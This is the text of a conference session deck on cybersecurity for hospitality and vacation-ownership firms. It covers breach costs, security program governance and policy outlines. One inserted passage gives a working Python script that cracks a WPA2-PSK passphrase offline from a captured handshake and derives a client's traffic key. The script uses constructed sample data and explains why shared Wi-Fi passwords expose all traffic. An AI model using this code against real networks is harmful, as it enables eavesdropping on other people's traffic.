#ARDAWorld: From Russia With Love
Is your technology vulnerable to data theft? Do you know your own security protocols? Learn about auditing cyber-security processes and discover how to stay compliant and safe from hacking attempts.
Tuesday, May 8, 1:30-2:45
From Russia With Love - Speakers
Robert Kobek, RRP, President, CustomerCount
Donald Smith, President, Cybermedic
Anurag Sharma, CISA, Principal, Withum
Erich Tines, VP, IT, Holiday Inn Club Vacations
Brian Mullen, VP, Infrastructure & Ops, HGV
Contents of Readiness Document
EXECUTIVE SUMMARY: MOBIUS VP, LLC INFORMATION SECURITY PLAN
  Identification and Assessment of Risks to Customer Information
  Information Security Plan Coordinator (ISPC)
  Design and Implementation of Safeguards Program
  Employee Management and Training
  Physical Security
  Information Systems
  Selection of Appropriate Service Providers
  Continuing Evaluation and Adjustment
  Summary of Policies, Standards, and Guidelines
MOBIUS VP, LLC POLICIES, STANDARDS, AND GUIDELINES
  Acceptable Use Policy: 1 General Use and Ownership; 2 Security and Proprietary Information; 3 Unacceptable Use
  Clean Desk Policy
  Email Policy
  Employee Turnover Policy: 1 New Employee On-Boarding; 2 Employee Transfer; 3 Employee Termination / Off-Boarding
  Password Construction Guidelines
  Remote Access Policy
  Wireless Communication Standards: 1 General Requirements; 2 Home Wireless Device Requirements
  Server Security Policy: 1 General Requirements; 2 Configuration Requirements; 3 Monitoring
The Hacker: Donald A. Smith, CyberMedic Intl., www.cybermedicsec.com, (517) 706-8359. A+, MCSE, CCNA, CISSP, CEH
Back Door
How Hard? How Long? How Much? Let's See a Demo!
Who and What is Vulnerable?
Open Wi-Fi = ALL USERS (no link encryption: anyone in range reads everything)
Secured Wi-Fi (shared password) = ALL TRAFFIC (anyone else who knows the password can read every client's traffic)
Wired Network = ALL DATA (anyone with a port on the segment)
Encrypted Network (end-to-end) = ZERO USERS, TRAFFIC OR DATA exposed!
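Why "Secured Wi-Fi = ALL TRAFFIC" holds, as an added example that is not from the deck or from any of the speakers: on a WPA2-PSK network every client's session key (the PTK) is a pure function of the shared password and of values that cross the air in the clear during the 4-way handshake (both MAC addresses and both nonces). So anyone who holds the password, or who guesses it offline against a captured handshake, can derive the keys of any client and decrypt its frames. The SSID, password, MAC addresses, nonces and EAPOL frame below are constructed sample data, not a real capture; the frame layout is an IEEE 802.11i RSN key descriptor with empty key data, and the MIC is the WPA2-PSK HMAC-SHA1 variant.

```python
import hashlib
import hmac

# --- IEEE 802.11i (WPA2-PSK) key derivation -------------------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP: KCK | KEK | TK) from the PMK plus the handshake's public values."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)

# --- EAPOL-Key message 2 and its MIC ---------------------------------------

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 descriptor bytes precede the 16-byte MIC field

def build_msg2_frame(snonce: bytes, key_data: bytes = b"") -> bytes:
    """EAPOL-Key frame (RSN descriptor) for handshake message 2, MIC field zeroed."""
    body = (bytes([2])                        # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")     # key info: pairwise, MIC present (message 2)
            + (16).to_bytes(2, "big")         # key length (CCMP)
            + (1).to_bytes(8, "big")          # replay counter
            + snonce                          # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8) # key IV, RSC, ID (unused in message 2)
            + bytes(16)                       # MIC, zero while it is being computed
            + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 (EAPOL-Key)


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """WPA2-PSK MIC: HMAC-SHA1 with the KCK over the whole EAPOL frame, truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def zero_mic(frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]

# --- Constructed sample "capture" (not real traffic) ------------------------

SSID = "HotelGuestWiFi"                      # constructed
TRUE_PSK = "vacation2018"                    # constructed shared password of the network
AP_MAC = bytes.fromhex("001122334455")       # constructed
STA_MAC = bytes.fromhex("66778899aabb")      # constructed
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()


def make_sample_handshake() -> bytes:
    """What a sniffer in range sees: the client's message 2 with its MIC filled in."""
    ptk = derive_ptk(pmk_from_passphrase(TRUE_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = build_msg2_frame(SNONCE)
    mic = eapol_mic(ptk[:16], frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]

# --- The exposure: anyone holding (or guessing) the PSK gets every client's keys -

def check_passphrase(candidate: str, msg2: bytes) -> bool:
    """True if `candidate` reproduces the MIC in the captured message 2."""
    ptk = derive_ptk(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    expected = eapol_mic(ptk[:16], zero_mic(msg2))
    return hmac.compare_digest(expected, msg2[MIC_OFFSET:MIC_OFFSET + 16])


def recover_passphrase(wordlist, msg2: bytes):
    """Offline dictionary check against the captured handshake; returns the PSK or None."""
    return next((w for w in wordlist if check_passphrase(w, msg2)), None)


def client_traffic_key(psk: str) -> bytes:
    """With the PSK known, the TK that encrypts this particular client's data frames."""
    return derive_ptk(pmk_from_passphrase(psk, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[32:48]


if __name__ == "__main__":
    captured = make_sample_handshake()
    found = recover_passphrase(["password", "letmein", "vacation2018", "guest1234"], captured)
    print("recovered PSK:", found)
    print("client TK:", client_traffic_key(found).hex())
```

The point of the check is that no interaction with the network is needed after the handshake is captured: the MIC on message 2 lets an attacker test candidate passwords at PBKDF2 speed, and a hotel-style shared password that every guest already knows skips even that step. Per-user credentials (802.1X/EAP) or an end-to-end layer such as TLS or a VPN is what moves a client from "all traffic" to "zero".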
Anurag Sharma (CISA, CRISC, CISSP), Principal
Information is the New Oil!
Companies are collecting and storing large amounts of data on a regular basis. This data may include information about employees, customers, intellectual property/trade secrets and business operations. This data has value to the companies producing/collecting it, to their competitors and to unknown third parties.
Breach Statistics (chart; source: BreachLevelIndex.com)
2017: Breaches By Region (chart; source: BreachLevelIndex.com)
How much does a cyber breach cost? Two answers: It depends. A lot.
How much does a cyber breach cost?
  Investigation (IT, legal, compliance, personnel)
  Remediation (IT, legal, compliance, personnel)
  Breach notification: to affected customers and employees; to regulators and enforcement agencies
  Remedies to affected individuals: credit monitoring; call center costs
  Additional consequences: regulatory investigation; enforcement agency action; litigation
Cost of breaches (chart)
Information Security: Brian Mullen, Hilton Grand Vacations
SECURITY IS A COMPANY ISSUE. CYBER SECURITY IS A CEO ISSUE. - McKinsey
$4.0M is the average cost of a data breach per incident.
81% of breaches involve weak or stolen passwords.
>300K new malware samples are created and spread every day.
87% of senior managers have admitted to accidentally leaking business data.
CYBER THREATS ARE A MATERIAL RISK TO OUR BUSINESS
Sources: McKinsey, Ponemon Institute, Verizon, Microsoft
CYBERSECURITY HAS CHANGED: cybersecurity used to mean building a bigger moat and a bigger wall.
HGV INFOSEC STRATEGY. INFOSEC FOCUS: balancing information protection, device health, identity management, and data telemetry, with risk management as the foundation. No silver bullets.
Erich Tines, VP Information Technology, Holiday Inn Club Vacations
The Statistics:
There is a cyber attack every 39 seconds.
81% of hacking-related breaches leveraged either stolen and/or weak passwords.
66% of malware was installed via malicious email attachments.
1 out of every 131 emails contains malware.
230,000 new malware samples are produced every day.
A data breach costs a company an average of $3.8 million.
It takes about 197 days for a breach to be detected.
3,927% cost increase of a data breach by 2020 (data breaches will exceed 150 million).
83% of financial companies suffer over 50 attacks per month, as do 44% of retail.
Sources: 2017 Verizon Data Breach Investigations Report, 10th Edition; https://www.symantec.com/security-center/threat-report; https://www.microsoft.com/en-us/cloud-platform/advanced-threat-analytics; https://www.pandasecurity.com/mediacenter/press-releases/all-recorded-malware-appeared-in-2015/; http://www.zdnet.com/article/businesses-take-over-six-months-to-detect-data-breaches/
Sample Process:
Dedicated Oversight: bring in expertise to oversee and be dedicated to your program; executive leadership participation; initiate experienced partnerships; audit the security program.
Governance: determine a framework to follow; establish a security board; define the security program; shape security policies.
IT Security Plan: Security Awareness & Training; Vulnerability Management; Access Management; Risk Assessments.
Vulnerability Management: establish asset management; deploy dashboard tools; institute patch management; perform penetration tests; inject security into your QA process.
Access Management: identify your data; define roles; automate provisioning; control access; audit, audit, audit!
Risk Assessments: define methodology; identify assets; understand threats and vulnerabilities; qualify risk (prioritize); mitigate to the agreed level.
Security Awareness & Training: understand your audience and develop a cohesive program; deliver training often; test the effectiveness of training; track participation; communicate often.
Talk, Talk, Talk. QUESTIONS?